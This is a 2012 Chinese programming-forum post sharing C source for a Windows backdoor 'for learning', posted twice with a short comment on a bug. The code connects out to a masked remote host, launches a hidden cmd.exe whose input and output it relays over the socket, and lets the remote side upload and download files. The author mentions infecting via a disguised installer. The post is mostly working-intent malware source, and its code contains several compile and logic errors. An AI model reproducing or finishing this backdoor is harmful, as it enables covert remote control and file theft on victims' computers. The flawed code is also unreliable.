首页
搜索
Latest images
注册
登录后门程序源代码学习--------
黑色星空 :: 黑色星空 :: 编程算法(转逻辑为现实) :: C语言编写
第1页/共1页
后门程序源代码学习--------
niusan521 周三 三月 07, 2012 7:00 pm
//感染的地方没有写到 没时间//至于感染,我会写个安装器来进行感染,然后伪装图标,利用互斥对像进程护相保护
/*
Protocol of connection
Connect : CONN
Connected Success : SUCC
Reboot : REBT 暂时不可用
Upload : UPLD
Download : DNLD
Destroy : DTOY 暂时不可用
Help : HELP 暂时不可用
OK : START TO TRANSFER FILE
DoneTrans : Finish Transferring
*/
#include<WinSock.h>
#include<stdio.h>
#include<memory.h>
#define CONNECT 0
#define LISTEN 1
#define ACCEPT 2
#define 加载WSA() LoadWSA()
#define 初始化套接字(地址的指针,设置,链接阵列,监听中的套接字) LoadSOCKET(地址的指针,设置,链接阵列,监听中的套接字)
#define 发送(套接字,缓冲区,数据长度) WSASend(套接字,缓冲区,数据长度)
#define 接受(套接字,数据长度) WSARecv(套接字,数据长度)
#define CONNECT 0
#define LISTEN 1
#define ACCEPT 2
#define INVALID_SETTING -50 //参数错误
#define MAXIMUM 65535
#define MINIMUM 1
#define READ 0
#define WRITE 1
#pragma comment(lib,"ws2_32.lib")
SOCKET sock;
HANDLE hReadWrite1[2];
HANDLE hReadWrite2[2];
STARTUPINFO SI;
SECURITY_ATTRIBUTES sa;
struct sockaddr_in saddr;
struct hostent *host;
long Bytes;
FILE fp;
int LoadWSA()//加载Winsock库
{
WSADATA wd;
if(WSAStartup(0x0202,&wd)!=0)//加载失败时返回WSA错误码
{
return(WSAGetLastError());
}
return 0;//否则返回0
}
SOCKET LoadSOCKET(struct sockaddr_in *saddr,int SET,int array,SOCKET ListenSocket)
{
SOCKET sock;
int size=sizeof(struct sockaddr);
if(SET<2)//如果传入设置为ACCEPT
{
sock=socket(AF_INET,SOCK_STREAM,0);
}
if(saddr=NULL)//传入空白的saddr
{
return -50;
}
switch(SET)
{
case 0://如果为CONNECT
{
if(connect(sock,(struct sockaddr*)&saddr,sizeof(struct sockaddr))<0)
{
return NULL;
}
}
case 1://如果为LISTEN
if(listen(sock,array)<0)
{
return NULL;
}
}
case 2://如果为ACCEPT
{
sock=accept(ListenSocket,(struct sockaddr*)saddr,&(size));
}
default://传入错误参数
{
return NULL;
}
}
}
int WSASend(SOCKET sock,char * buffer,int Length)
{
int size;
int ret;
if(Length<1)
{
size=sizeof(buffer);
}
else
{
size=Length;
}
size=send(sock,buffer,size,0);
return size;
}
char * WSARecv(SOCKET sock,int Length)
{
FD_SET fd;
char *buffer=(char*)malloc(65535);
char *ret;
int sizeofP;
int size;
if(Length=0)
{
size=MAXIMUM;
}
else
{
size=Length;
}
FD_ZERO(&fd);
FD_SET(sock,&fd);
for(;
{
if(select(sock+1,&fd,0,0,0)>0)
{
if(FD_ISSET(sock,&fd))
{
if(sizeofP=(recv(sock,buffer,size,0))>0)
{
ret=(char*)malloc(sizeofP);memcpy(ret,buffer,sizeofP);
free(buffer);
return ret;
}
}
}
FD_ZERO(&fd);
}
}
int SENDCOMMAND()
{
int ret;
char *buf;
for(;
{
ret=WSASend(sock,"CONN",sizeof("CONN"));
buf=WSARecv(sock,4);
if(buf=="SUCC")
{
free(buf);
break;
}
}
}
int UploadFile(SOCKET sock)
{
char *buffer=(char*)malloc(1024);
char *PATH=(char*)malloc(1000);
FILE *fp;
long trueLen;
recv(sock,PATH,1000,0);
fp=fopen(PATH,"wb+");
send(sock,"OK",strlen("OK"),0);
while(1)
{
trueLen=recv(sock,buffer,1024,0);
if(buffer[0]!='D'&&buffer[1]!='o'&&buffer[2]!='n'&&buffer[3]!='e'&&buffer[4]!='T'&&buffer[5]!='r'&&buffer[6]!='a'&&buffer[7]!='n'&&buffer[8]!='s')
{
fwrite(buffer,1,trueLen,fp);
}
else
{
break;
}
}
}
int DownloadFile(SOCKET sock)
{
char *buffer=(char*)malloc(1024);char *PATH=(char*)malloc(1000);
FILE *fp;
long trueLen;
recv(sock,PATH,1000,0);
fp=fopen(PATH,"rb+");
send(sock,"OK",strlen("OK"),0);
Sleep(1000);
while(1)
{
if(!feof(fp))
{
trueLen=fread(buffer,1,1024,fp);
send(sock,buffer,trueLen,0);
}
else
{
send(sock,"DoneTrans",9,0);
break;
}
}
}
int main()
{
char *ip;
char *command;
char *buffer=(char*)malloc(4096);
loop:if(加载WSA()!=0)
{
Sleep(5000);
goto loop;
}
sa.lpSecurityDescriptor=0;
sa.bInheritHandle=1;
sa.nLength=12;
CreatePipe(&hReadWrite1[READ],&hReadWrite1[WRITE],&sa,0);
CreatePipe(&hReadWrite2[READ],&hReadWrite2[WRITE],&sa,0);
SI.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
SI.wShowWindow=SW_HIDE;
SI.hStdInput=hReadWrite1[WRITE];
SI.hStdOutput=hReadWrite1[READ];
SI.hStdError=hReadWrite1[READ];
lp:host=gethostbyname("************.net");
if(host==NULL)
{
goto lp;
}
memcpy(&saddr.sin_addr.S_un.S_addr,&host->h_addr_list[0],host->h_length);
saddr.sin_port=htons(6123);
saddr.sin_family=host->h_addrtype;
aak:sock=LoadSOCKET(&saddr,CONNECT,0,0);
if(sock==NULL)
{
goto aak;
}SENDCOMMAND();
CreateProcess(0,"cmd.exe",&sa,0,0,0,0,0,&SI,0);
for(;
{
PeekNamedPipe(hReadWrite1[0],buffer,4096,(LPDWORD)&Bytes,0,0);
if(Bytes)
{
ReadFile(hReadWrite1[READ],buffer,Bytes,0,0);
WSASend(sock,buffer,Bytes);
}
else
{
recv(sock,buffer,4096,0);
if(buffer[0]=='U'&&buffer[1]=='P'&&buffer[2]=='L'&&buffer[3]=='D')
{
UploadFile(sock);
}
else
{
if(buffer[0]=='D'&&buffer[1]=='N'&&buffer[2]=='L'&&buffer[3]=='D')
{
DownloadFile(sock);
}
else
{
WriteFile(
hReadWrite1[WRITE],
buffer,
strlen(buffer),
0,
0
);
}
}
}
}
}
错了 改正一下 应该是saddr==NULL 我坏习惯 以后你应该写成这样 NULL==saddr 这样如果是=号的话 编译器就会报错了 因为变量是不可能赋给一个常数的 这样以后好差错
/*
Protocol of connection
Connect : CONN
Connected Success : SUCC
Reboot : REBT 暂时不可用
Upload : UPLD
Download : DNLD
Destroy : DTOY 暂时不可用
Help : HELP 暂时不可用
OK : START TO TRANSFER FILE
DoneTrans : Finish Transferring
*/
#include<WinSock.h>
#include<stdio.h>
#include<memory.h>
#define CONNECT 0
#define LISTEN 1
#define ACCEPT 2
#define 加载WSA() LoadWSA()
#define 初始化套接字(地址的指针,设置,链接阵列,监听中的套接字) LoadSOCKET(地址的指针,设置,链接阵列,监听中的套接字)
#define 发送(套接字,缓冲区,数据长度) WSASend(套接字,缓冲区,数据长度)
#define 接受(套接字,数据长度) WSARecv(套接字,数据长度)
#define CONNECT 0
#define LISTEN 1
#define ACCEPT 2
#define INVALID_SETTING -50 //参数错误
#define MAXIMUM 65535
#define MINIMUM 1
#define READ 0
#define WRITE 1
#pragma comment(lib,"ws2_32.lib")
SOCKET sock;
HANDLE hReadWrite1[2];
HANDLE hReadWrite2[2];
STARTUPINFO SI;
SECURITY_ATTRIBUTES sa;
struct sockaddr_in saddr;
struct hostent *host;
long Bytes;
FILE fp;
int LoadWSA()//加载Winsock库
{
WSADATA wd;
if(WSAStartup(0x0202,&wd)!=0)//加载失败时返回WSA错误码
{
return(WSAGetLastError());
}
return 0;//否则返回0
}
SOCKET LoadSOCKET(struct sockaddr_in *saddr,int SET,int array,SOCKET ListenSocket)
{
SOCKET sock;
int size=sizeof(struct sockaddr);
if(SET<2)//如果传入设置为ACCEPT
{
sock=socket(AF_INET,SOCK_STREAM,0);
}
if(saddr=NULL)//传入空白的saddr
{
return -50;
}
switch(SET)
{
case 0://如果为CONNECT
{
if(connect(sock,(struct sockaddr*)&saddr,sizeof(struct sockaddr))<0)
{
return NULL;
}
}
case 1://如果为LISTEN
if(listen(sock,array)<0)
{
return NULL;
}
}
case 2://如果为ACCEPT
{
sock=accept(ListenSocket,(struct sockaddr*)saddr,&(size));
}
default://传入错误参数
{
return NULL;
}
}
}
int WSASend(SOCKET sock,char * buffer,int Length)
{
int size;
int ret;
if(Length<1)
{
size=sizeof(buffer);
}
else
{
size=Length;
}
size=send(sock,buffer,size,0);
return size;
}
char * WSARecv(SOCKET sock,int Length)
{
FD_SET fd;
char *buffer=(char*)malloc(65535);
char *ret;
int sizeofP;
int size;
if(Length=0)
{
size=MAXIMUM;
}
else
{
size=Length;
}
FD_ZERO(&fd);
FD_SET(sock,&fd);
for(;
{
if(select(sock+1,&fd,0,0,0)>0)
{
if(FD_ISSET(sock,&fd))
{
if(sizeofP=(recv(sock,buffer,size,0))>0)
{
ret=(char*)malloc(sizeofP);memcpy(ret,buffer,sizeofP);
free(buffer);
return ret;
}
}
}
FD_ZERO(&fd);
}
}
int SENDCOMMAND()
{
int ret;
char *buf;
for(;
{
ret=WSASend(sock,"CONN",sizeof("CONN"));
buf=WSARecv(sock,4);
if(buf=="SUCC")
{
free(buf);
break;
}
}
}
int UploadFile(SOCKET sock)
{
char *buffer=(char*)malloc(1024);
char *PATH=(char*)malloc(1000);
FILE *fp;
long trueLen;
recv(sock,PATH,1000,0);
fp=fopen(PATH,"wb+");
send(sock,"OK",strlen("OK"),0);
while(1)
{
trueLen=recv(sock,buffer,1024,0);
if(buffer[0]!='D'&&buffer[1]!='o'&&buffer[2]!='n'&&buffer[3]!='e'&&buffer[4]!='T'&&buffer[5]!='r'&&buffer[6]!='a'&&buffer[7]!='n'&&buffer[8]!='s')
{
fwrite(buffer,1,trueLen,fp);
}
else
{
break;
}
}
}
int DownloadFile(SOCKET sock)
{
char *buffer=(char*)malloc(1024);char *PATH=(char*)malloc(1000);
FILE *fp;
long trueLen;
recv(sock,PATH,1000,0);
fp=fopen(PATH,"rb+");
send(sock,"OK",strlen("OK"),0);
Sleep(1000);
while(1)
{
if(!feof(fp))
{
trueLen=fread(buffer,1,1024,fp);
send(sock,buffer,trueLen,0);
}
else
{
send(sock,"DoneTrans",9,0);
break;
}
}
}
int main()
{
char *ip;
char *command;
char *buffer=(char*)malloc(4096);
loop:if(加载WSA()!=0)
{
Sleep(5000);
goto loop;
}
sa.lpSecurityDescriptor=0;
sa.bInheritHandle=1;
sa.nLength=12;
CreatePipe(&hReadWrite1[READ],&hReadWrite1[WRITE],&sa,0);
CreatePipe(&hReadWrite2[READ],&hReadWrite2[WRITE],&sa,0);
SI.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
SI.wShowWindow=SW_HIDE;
SI.hStdInput=hReadWrite1[WRITE];
SI.hStdOutput=hReadWrite1[READ];
SI.hStdError=hReadWrite1[READ];
lp:host=gethostbyname("************.net");
if(host==NULL)
{
goto lp;
}
memcpy(&saddr.sin_addr.S_un.S_addr,&host->h_addr_list[0],host->h_length);
saddr.sin_port=htons(6123);
saddr.sin_family=host->h_addrtype;
aak:sock=LoadSOCKET(&saddr,CONNECT,0,0);
if(sock==NULL)
{
goto aak;
}SENDCOMMAND();
CreateProcess(0,"cmd.exe",&sa,0,0,0,0,0,&SI,0);
for(;
{
PeekNamedPipe(hReadWrite1[0],buffer,4096,(LPDWORD)&Bytes,0,0);
if(Bytes)
{
ReadFile(hReadWrite1[READ],buffer,Bytes,0,0);
WSASend(sock,buffer,Bytes);
}
else
{
recv(sock,buffer,4096,0);
if(buffer[0]=='U'&&buffer[1]=='P'&&buffer[2]=='L'&&buffer[3]=='D')
{
UploadFile(sock);
}
else
{
if(buffer[0]=='D'&&buffer[1]=='N'&&buffer[2]=='L'&&buffer[3]=='D')
{
DownloadFile(sock);
}
else
{
WriteFile(
hReadWrite1[WRITE],
buffer,
strlen(buffer),
0,
0
);
}
}
}
}
}
错了 改正一下 应该是saddr==NULL 我坏习惯 以后你应该写成这样 NULL==saddr 这样如果是=号的话 编译器就会报错了 因为变量是不可能赋给一个常数的 这样以后好差错
niusan521- 帖子数 : 210
注册日期 : 12-01-09
黑色星空 :: 黑色星空 :: 编程算法(转逻辑为现实) :: C语言编写
第1页/共1页
您在这个论坛的权限:
您不能在这个论坛回复主题